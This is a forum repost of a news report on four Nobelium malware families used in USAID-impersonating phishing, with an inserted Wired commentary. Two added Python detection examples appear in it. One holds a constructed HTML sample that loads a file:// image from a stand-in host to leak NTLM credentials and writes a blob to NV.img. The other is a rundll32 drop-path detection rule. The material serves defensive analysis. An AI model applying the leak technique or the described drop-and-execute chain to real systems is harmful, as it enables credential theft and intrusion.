  • Microsoft: Russian hackers used 4 new malware in USAID phishing

    Karlston

    Microsoft states that a Russian hacking group used four new malware families in recent phishing attacks impersonating the United States Agency for International Development (USAID).

     

    Thursday night, the Microsoft Threat Intelligence Center (MSTIC) disclosed that the Russian-backed hacking group APT29, also known as Nobelium, had compromised the Constant Contact account for USAID.

     

    Using this legitimate marketing account, the threat actors impersonated USAID in phishing emails sent to approximately 3,000 email accounts at more than 150 different organizations, including government agencies and organizations devoted to international development, humanitarian, and human rights work.

    [Image: Targeted phishing emails pretending to be from USAID]

    New malware used by Nobelium

    In a second blog post released Friday night, Microsoft provides details on four new malware families used by Nobelium in these recent attacks.

     

    The four new families include an HTML attachment named 'EnvyScout', a downloader known as 'BoomBox,' a loader known as 'NativeZone', and a shellcode downloader and launcher named 'VaporRage.'

    EnvyScout

    EnvyScout is a malicious HTML/JS file attachment used in spear-phishing emails that attempts to steal the NTLM credentials of Windows accounts and drops a malicious ISO on a victim's device.

     

    The attachment is distributed as a file named NV.html. When opened, the HTML file attempts to load an image from a file:// URL; Windows may then send the logged-in user's NTLM credentials to the remote site, where attackers can capture and brute-force them to reveal the plain text password.

    [Image: Loading a remote image using the file:// URL]

    Microsoft states that the attachment is also used to convert an embedded text blob into a malicious ISO saved as NV.img to the local file system.

    [Image: NV.html attachment saving the ISO image]

    "At this stage of infection, the user is expected to open the downloaded ISO, NV.img, by double clicking it," explains Microsoft.

     

    When the ISO image opens, Windows will show the user a shortcut named NV that executes the hidden BOOM.exe, which is part of the new BoomBox malware family described below.

    [Image: Contents of NV.img ISO file]

    Security researcher Florian Roth discovered another phishing campaign pretending to be from the Embassy of Belgium using this same malware attachment.

    [Image: Phishing campaign impersonating the Embassy of Belgium]
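A mail-gateway triage check for the two EnvyScout traits described above (an image fetched over file:// and an embedded blob written out as an .img/.iso), added here as an example and not code from Microsoft or BleepingComputer. The sample HTML is constructed for the test: `decode`/`saveAs` are deliberately undefined, the base64 text is a placeholder, and 203.0.113.10 is a documentation address.

```python
import re
from html.parser import HTMLParser

# Constructed sample showing the two traits described above; it is not the real NV.html
# (decode/saveAs are deliberately undefined and 203.0.113.10 is a documentation IP).
SAMPLE_HTML = """<html><body>
<img src="file://203.0.113.10/share/pixel.png" width="1" height="1">
<script>
var payload = "VGhpcyBpcyBqdXN0IGEgY29uc3RydWN0ZWQgcGxhY2Vob2xkZXIgYmxvYg==";
var blob = new Blob([decode(payload)], {type: "application/octet-stream"});
saveAs(blob, "NV.img");
</script></body></html>"""

class _ImgCollector(HTMLParser):
    """Collect the src attribute of every <img> tag."""
    def __init__(self):
        super().__init__()
        self.srcs = []
    def handle_starttag(self, tag, attrs):
        if tag.lower() == "img":
            self.srcs += [v for k, v in attrs if k.lower() == "src" and v]

def triage_html(html):
    """Report EnvyScout-style traits found in an HTML attachment."""
    parser = _ImgCollector()
    parser.feed(html)
    # An <img> whose src is a file:// URL or UNC path makes Windows open an SMB connection
    # to that host, which is how the NTLM credential leak described above happens.
    leak_srcs = [s for s in parser.srcs if re.match(r"(?i)^(file:|\\\\)", s.strip())]
    # A long base64 run plus Blob code naming an .img/.iso file is the smuggled-ISO trait.
    image_name = re.search(r"""["']([^"']+\.(?:img|iso))["']""", html, re.I)
    writes_image = bool(re.search(r"new\s+Blob\s*\(", html)) and image_name is not None
    return {
        "ntlm_leak_srcs": leak_srcs,
        "writes_disk_image": writes_image,
        "disk_image_name": image_name.group(1) if writes_image else None,
        "embedded_blob": bool(re.search(r"[A-Za-z0-9+/=]{40,}", html)),
    }

def verdict(traits):
    """Flag the attachment when two or more traits co-occur."""
    score = bool(traits["ntlm_leak_srcs"]) + traits["writes_disk_image"] + traits["embedded_blob"]
    return "suspicious" if score >= 2 else "clean"
```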

    BoomBox

    Microsoft is tracking the BOOM.exe file in the ISO image as 'BoomBox,' and states that it is used to download two encrypted malware files to the infected device from DropBox.

     

    After decrypting the downloaded files, BoomBox will save them as %AppData%\Microsoft\NativeCache\NativeCacheSvc.dll and %AppData%\SystemCertificates\CertPKIProvider.dll, and execute them using rundll32.exe.

     

    NativeCacheSvc.dll is configured to launch automatically when a user logs into Windows and is used to launch CertPKIProvider.dll.

     

    As a final stage, the BoomBox malware gathers information about the Windows domain, encrypts the collected data, and then sends it to a remote server under the attacker's control.

     

    "As the final reconnaissance step, if the system is domain-joined, BoomBox executes an LDAP query to gather data such as distinguished name, SAM account name, email, and display name of all domain users via the filter (&(objectClass=user)(objectCategory=person))," Microsoft explains.

    NativeZone

    Microsoft detects the NativeCacheSvc.dll file as a new malware loader called 'NativeZone.' 

     

    This malware is dropped and configured by BoomBox to start automatically when a user logs into Windows.

     

    When started via rundll32.exe, it will launch the CertPKIProvider.dll malware that Microsoft detects as 'VaporRage.'

    VaporRage

    The fourth malware used in these attacks is called 'VaporRage,' and it is the CertPKIProvider.dll file described in the previous NativeZone section.

     

    When launched, the malware connects to a remote command and control server, registers itself with the attackers, and then repeatedly polls the remote site for shellcode to download.

    When shellcode is downloaded, the malware executes it to perform various malicious activities, including the deployment of Cobalt Strike beacons.
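The BoomBox, NativeZone and VaporRage stages above share one observable: rundll32.exe loading a DLL that was dropped under the user's %AppData% profile. The following detection rule over process-creation records is an added example (not Microsoft's or BleepingComputer's code); the event lines are constructed, ',Start' is a placeholder export name, and the only page-derived values are the two DLL drop paths.

```python
import re

# Constructed process-creation records (not real telemetry); ',Start' is a placeholder
# export name. %AppData% expands to C:\Users\<user>\AppData\Roaming, where BoomBox drops both DLLs.
SAMPLE_EVENTS = [
    'host=WS01 parent=explorer.exe image=C:\\Windows\\System32\\rundll32.exe '
    'cmd="rundll32.exe C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\NativeCache\\NativeCacheSvc.dll,Start"',
    'host=WS01 parent=rundll32.exe image=C:\\Windows\\System32\\rundll32.exe '
    'cmd="rundll32.exe C:\\Users\\alice\\AppData\\Roaming\\SystemCertificates\\CertPKIProvider.dll,Start"',
    'host=WS01 parent=explorer.exe image=C:\\Windows\\System32\\rundll32.exe '
    'cmd="rundll32.exe shell32.dll,Control_RunDLL desk.cpl"',
    'host=WS01 parent=explorer.exe image="C:\\Program Files\\Google\\Chrome\\chrome.exe" cmd="chrome.exe"',
]

# Drop locations the article reports for NativeZone and VaporRage, relative to the profile root.
KNOWN_DROP_PATHS = (
    r"appdata\roaming\microsoft\nativecache\nativecachesvc.dll",
    r"appdata\roaming\systemcertificates\certpkiprovider.dll",
)

_FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

def parse_event(line):
    """Split one key=value record into a dict, honouring double-quoted values."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in _FIELD.finditer(line)}

def rundll32_dll_argument(cmd):
    """Return the DLL rundll32 was asked to load (the text before ',export'), or None."""
    parts = cmd.split(None, 1)
    if len(parts) < 2 or not parts[0].lower().endswith("rundll32.exe"):
        return None
    return parts[1].split(",", 1)[0].strip().strip('"')

def classify(event):
    """Names of the detection rules fired by one event; an empty list means nothing suspicious."""
    rules = []
    if not event.get("image", "").lower().endswith("\\rundll32.exe"):
        return rules
    dll = rundll32_dll_argument(event.get("cmd", ""))
    if not dll:
        return rules
    low = dll.lower()
    if any(low.endswith(p) for p in KNOWN_DROP_PATHS):
        rules.append("nobelium_known_dll_path")      # exact paths from the report
    if "\\appdata\\" in low:
        rules.append("rundll32_dll_from_appdata")    # broader: DLL in a user-writable profile dir
    return rules
```

The second rule generalizes beyond the two reported file names to any rundll32 load from AppData, so expect to tune it against legitimate installers in your environment.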

    The same group behind SolarWinds attack

    The hacking group behind these attacks is believed to be the same group behind the SolarWinds supply-chain attack.

     

    This group is tracked as Nobelium (Microsoft), UNC2452 (FireEye), StellarParticle (CrowdStrike), SolarStorm (Palo Alto Unit 42), and Dark Halo (Volexity).

     

    SolarWinds stated that the attack cost them $3.5 million in expenses but is expecting additional costs as time goes on.

     

    The US government formally accused the Russian Foreign Intelligence Service (tracked as APT29, The Dukes, or Cozy Bear) as the group behind the SolarWinds attack.


    Recommended Comments

    The SolarWinds hackers aren’t back—they never went away

    A new phishing campaign is less an escalation than a regression to the mean.

    [Image: "And people reliably click on these emails? Really?" Kremlin official photo]

    The Russian hackers who breached SolarWinds IT management software to compromise a slew of United States government agencies and businesses are back in the limelight. Microsoft said on Thursday that the same “Nobelium” spy group has built out an aggressive phishing campaign since January of this year and ramped it up significantly this week, targeting roughly 3,000 individuals at more than 150 organizations in 24 countries.

     

    The revelation caused a stir, highlighting as it did Russia's ongoing and inveterate digital espionage campaigns. But it should be no shock at all that Russia in general, and the SolarWinds hackers in particular, have continued to spy even after the US imposed retaliatory sanctions in April. And relative to SolarWinds, a phishing campaign seems downright ordinary.

     

    “I don’t think it’s an escalation, I think it’s business as usual,” says John Hultquist, vice president of intelligence analysis at the security firm FireEye, which first discovered the SolarWinds intrusions. “I don’t think they’re deterred and I don’t think they’re likely to be deterred.”

     

    Russia's latest campaign is certainly worth calling out. Nobelium compromised legitimate accounts from the bulk email service Constant Contact, including that of the United States Agency for International Development. From there the hackers, reportedly members of Russia's SVR foreign intelligence agency, could send out specially crafted spear-phishing emails that genuinely came from the email accounts of the organization they were impersonating. The emails included legitimate links that then redirected to malicious Nobelium infrastructure and installed malware to take control of target devices.

     

    While the number of targets seems large, and USAID works with plenty of people in sensitive positions, the actual impact may not be quite as severe as it first sounds. While Microsoft acknowledges that some messages may have gotten through, the company says that automated spam systems blocked many of the phishing messages. Microsoft corporate vice president for customer security and trust Tom Burt wrote in a blog post on Thursday that the company views the activity as “sophisticated” and that Nobelium evolved and refined its strategy for the campaign for months leading up to this week's targeting.

     

    “It is likely that these observations represent changes in the actor’s tradecraft and possible experimentation following widespread disclosures of previous incidents,” Burt wrote. In other words, this could be a pivot after their SolarWinds cover was blown.

     

    But the tactics in this latest phishing campaign also reflect Nobelium's general practice of establishing access on one system or account and then using it to gain access to others and leapfrog to numerous targets. It's a spy agency; this is what it does as a matter of course.

     

    “If this happened pre-SolarWinds we wouldn’t have thought anything about it. It’s only the context of SolarWinds that makes us see it differently," says Jason Healey, a former Bush White House staffer and current cyberconflict researcher at Columbia University. “Let’s say this incident happens in 2019 or 2020, I don’t think anyone is going to blink an eye at this.”

     

    As Microsoft points out, there's also nothing unexpected about Russian spies, and Nobelium in particular, targeting government agencies, USAID in particular, NGOs, think tanks, research groups, or military and IT service contractors.

     

    “NGOs and DC think tanks have been high-value soft targets for decades,” says one former Department of Homeland Security cybersecurity consultant. “And it's an open secret in the incident response world that USAID and the State Department are a mess of unaccountable, subcontracted IT networks and infrastructure. In the past, some of those systems were compromised for years."

     

    Especially compared to the scope and sophistication of the SolarWinds breach, a widespread phishing campaign feels almost like a downshift. It's also important to remember that the impacts of SolarWinds remain ongoing; even after months of publicity about the incident, it's likely that Nobelium still haunts at least some of the systems it compromised during that effort.

     

    “I’m sure that they’ve still got accesses in some places from the SolarWinds campaign,” FireEye’s Hultquist says. “The main thrust of the activity has been diminished, but they’re very likely lingering on in several places.”

     

    Which is just the reality of digital espionage. It doesn't stop and start based on public shaming. Nobelium's activity is certainly unwelcome, but it doesn't in itself portend some great escalation.

     

    Additional reporting by Andy Greenberg. This story originally appeared on wired.com.
